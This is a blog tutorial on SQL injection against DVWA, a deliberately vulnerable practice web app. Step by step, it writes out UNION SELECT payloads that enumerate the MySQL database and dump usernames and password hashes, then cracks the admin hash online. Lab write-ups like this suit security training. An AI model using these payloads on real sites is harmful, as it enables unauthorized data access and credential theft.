Home > DVWA > DVWA: Damn Vulnerable Web Application SQL Injection Attack (Low Security)

DVWA: Damn Vulnerable Web Application SQL Injection Attack (Low Security)

January 27, 2023

"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."

 

 Damn Vulnerable Web App (DVWA) is a web application that is coded in PHP and uses MySQL database, where we can practice some common web vulnerabilities with different levels of security. Basically, it is a place where we can legally test our hacking ability. In this article, we’re only going to talk about one of the attacks in DVWA, SQL injection.



SQL injection, also known as SQLi, is an attack that executes malicious SQL code. SQL itself is a query language that can access, modify, and delete data. Hence, SQL injection allows attackers to do a lot of things with a web database, ranging from accessing all data in a database (e.g. finding data for all students such as illustrated below) to altering (e.g. changing bank account balances) and deleting data.


In this tutorial, we are going to exploit a SQL injection vulnerability on the Damn Vulnerable Web Application (DVWA).

Usually, the attacker has different tools to accomplish his task like:

Those two are the best known, by the way, in this tutorial we don’t need them.

Lab requirements

  • Kali Linux
  • DVWA

This tutorial assumes you have set up the required lab environments to run the penetration test. If you need help setting up DVWA, Please comment I will post an article regarding it soon.

Head to the  DWA login page now. (eg: http://target.site/dvwa). It will ask for a username and password. The default username is 'admin' and the password is 'password'.




Before we begin, we need to ensure that our DVWA security setting is low. This can be done by going to the DVWA Security tab and selecting low from the drop-down menu.


Now that we have our security setting configured, we can move on to exploiting the SQL injection!


We are ready to test our SQL injection attack on DVWA. The first step is to select “SQL injection” from the menu on the left.

I won’t go in-depth with the concepts in this tutorial however, I will soon post an article on Learn SQL injection!



Let’s try to pass the following input to the form, just to check if the vulnerability is present:

Enter user ID ‘1’ and submit.

 And this is the result, A record is returned:



Now, instead of entering valid input like 1, try inputting a single quote character ( ' ) and observe its behavior.


The error message revealed the database is MySQL. And it also implied that a single quote might lead to SQL Injection. 

Next, input the classical 1='1 along with 1' SQL Injection vector.


And this is the result:


To enumerate the entire database, the next step is to check how many columns the original query return. It can be done by using the following vector.

This time, I’ll use the “GROUP BY” technique. You can use "ORDER" too.

As a refresh, we need to append a GROUP BY clause to our query and set the index of the field; when the index doesn’t exist it means that we are out of range and the number of fields is one less than that index.

Our query should appear like this:

... GROUP BY <NUMBER> #

 Where we have to replace “<NUMBER>” with an increasing index until we get an error.

So let’s try to pass as input the following strings:

1' GROUP BY 1 # 

 


1' GROUP BY 2 # 

 

1' GROUP BY 3 #

 When we try with “index=3” the server raises an error and shows us this message:



So the number of columns returned is 2, which should be the first name and surname columns. It means that the query involves two fields, and this will be helpful when we’ll try to get additional information using the UNION SELECT query.

We can check our assumption about the DBMS by typing:

1' OR 1=1 UNION SELECT 1, VERSION()#

The function “VERSION” comes from MySQL and shows the “version” system variable.

So, after clicking “Submit” and getting the result in the image below, we know that the DBMS is MySQL. 


In the last row, we also get the version of the running DBMS: 5.0.51a.

Now, this is time to obtain the info about the schema, at this point we know that:

  1. The DBMS is MySQL 5.0.51a
  2. The query involves two fields

This step is optional, but we don’t want to be confused by too many results, so I prefer to get the current database name so that we can filter the results in the next step:

1' OR 1=1 UNION SELECT 1,DATABASE() #

Even in this case “DATABASE” is a MySQL function that returns the name of the current database, so this will be our result:


Clearly, the name we were looking for is “dvwa” in the last line!

Now we can continue and retrieve the table names using this query:

1' OR 1=1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type='base table' AND table_schema='dvwa' #

 The result is straightforward to understand, in particular, the table “users” at the end of the results, seems interesting for our work.

In the end, we need to know the names of the columns of the target table.

The process to retrieve this information is the same as we used until now, let’s write our query:

1' OR 1=1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users' #

 This query will show us all the columns’ names in the table “users” if the schema has the same name for many tables, you can add a clause for specifying the table_schema.


The highlighted fields are the ones we are interested in the final phase.

Get to this point, we have all we need to perform our attack!

Retrieving the credentials

I bet you already know what we are going to do, anyway, for the sake of clarification I’ll show you the complete process.

The query we are going to write should retrieve the fields user and password:

1' OR 1=1 UNION SELECT user, password FROM users #

After submitting the “exploit” we get the list of all the credentials in the “users” table:


The more promising is the one inside the square (probably they are the credentials of an administrator account), this time, the password is not saved as plain text, so we need one more step and crack it.

Go to Crackstation and now, let’s copy-paste the found password in the CrackStation's text area, then solve the captcha and see the result!


We are done! The username is “admin” and the password is “OyeeCoder”.

This write-up of SQL injection with DVWA having low-security settings was pretty easy, but I hope It was didactic as much as possible. The practice will make you more confident to approach even more complicated scenarios during penetration testing or bug hunting.

If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.

Post a Comment

No comments

Thank you for taking the time to leave a comment on my blog. I appreciate your feedback and contribution to the conversation on my blog. Your comment will be automatically approved and visible to other readers. Please note that while I encourage open and respectful dialogue, my team reserves the right to review and remove any comments that violate this blog's terms and conditions, or are considered to be spam or offensive.

Subscribe to: Post Comments ( Atom )
Powered by Blogger.